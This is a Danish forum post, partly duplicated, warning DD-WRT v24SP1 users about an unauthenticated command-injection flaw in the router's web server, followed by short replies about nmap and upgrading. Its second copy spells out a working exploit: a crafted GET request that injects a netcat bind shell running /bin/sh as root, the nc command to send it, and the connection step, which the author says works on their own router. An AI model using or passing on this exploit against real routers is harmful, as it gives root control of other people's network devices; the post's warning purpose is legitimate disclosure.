Advarsel til DD-WRT brugere
For nogen tid siden begyndte man at spekulere ikke i penetrationen af en persons PC men snarere de routere som vendte ud mod omverdenen.
Mange har fejlagtigt den tro, at fordi en router i nogen grad kan betragtes som en HW-firewall så er den hellige grav vel forvaret.
Nu er der så fundet et meget groft hul i det populare DD-WRT firmware:
http://www.milw0rm.com/exploits/9209
Kort fortalt:
Dette exploit benytter DD-WRT v24SP1 som er den nyeste DD-WRT udgivelse der er tilgængelig - vha. en række forseelser i firmware koden deriblandt:
1) Man kan sende kommandoer til routeren via nettet - uden autorisation
2) httpd serveren (som eksekverer kommandoen) kører som root
Står man altså i den situation, at en person i dit LAN kan overtage routeren fuldstændigt - ligeledes kunne en specielt konstrueret hjemmeside også resultere i at du (uden at vide det) sendte de nødvendige kommandoer for at åbne op til routeren udefra.
Ville bare lige advare andre der også ligger inde med DD-WRT routere da de har en vis popularitet!
PPS!
Jeg har testet på min v24SP1 router og det virker fint - dog kan jeg ikke umiddelbart bruge det mod min DD-WRT v23SP2 router.
Begge de testede routere er af mærket Linksys WRT54GL (selvom dette ikke burde have en indvirkning)
Test din router
Lav en ny tekstfil
Hvor 192.168.2.2 erstattes af din routers IP
Således åbnes porten:
Igen, erstat 192.168.2.2 med din routers ip
Således får du adgang til din root shell:
Som man kan se sender man simpelthen en forespørgsel til routeren om at netcat skal lytte på port 5555 efter forbindelser og eksekvere /bin/sh når forbindelsen oprettes - resultatet er at når du forbinder har du en root shell at lege med.
Mange har fejlagtigt den tro, at fordi en router i nogen grad kan betragtes som en HW-firewall så er den hellige grav vel forvaret.
Nu er der så fundet et meget groft hul i det populare DD-WRT firmware:
http://www.milw0rm.com/exploits/9209
Kort fortalt:
Dette exploit benytter DD-WRT v24SP1 som er den nyeste DD-WRT udgivelse der er tilgængelig - vha. en række forseelser i firmware koden deriblandt:
1) Man kan sende kommandoer til routeren via nettet - uden autorisation
2) httpd serveren (som eksekverer kommandoen) kører som root
Står man altså i den situation, at en person i dit LAN kan overtage routeren fuldstændigt - ligeledes kunne en specielt konstrueret hjemmeside også resultere i at du (uden at vide det) sendte de nødvendige kommandoer for at åbne op til routeren udefra.
Ville bare lige advare andre der også ligger inde med DD-WRT routere da de har en vis popularitet!
PPS!
Jeg har testet på min v24SP1 router og det virker fint - dog kan jeg ikke umiddelbart bruge det mod min DD-WRT v23SP2 router.
Begge de testede routere er af mærket Linksys WRT54GL (selvom dette ikke burde have en indvirkning)
Test din router
Lav en ny tekstfil
GET /cgi-bin/;nc$IFS-l$IFS-p$IFS\5555$IFS-e$IFS/bin/sh HTTP/1.0
Host:192.168.2.2
Hvor 192.168.2.2 erstattes af din routers IP
Således åbnes porten:
cat evil-ddwrt-req | nc 192.168.2.2 80
Igen, erstat 192.168.2.2 med din routers ip
Således får du adgang til din root shell:
nc 192.168.1.1 5555
Som man kan se sender man simpelthen en forespørgsel til routeren om at netcat skal lytte på port 5555 efter forbindelser og eksekvere /bin/sh når forbindelsen oprettes - resultatet er at når du forbinder har du en root shell at lege med.
Kommentarer4
Re: Advarsel til DD-WRT brugere
EDIT:
Måske ikke alligevel - Legede lige lidt med nmap.
Hvad vil det sige at der er en filtered port?
Re: filtered port
D.v.s. at nmap ikke kan afgøre, om porten er åben, fordi f.eks. en firewall forhindrer pakken i at nå porten. Se 'man nmap', 'Port scanning basics'.
Re: Advarsel til DD-WRT brugere
Tid til en opgradering. :)
Re: Advarsel til DD-WRT brugere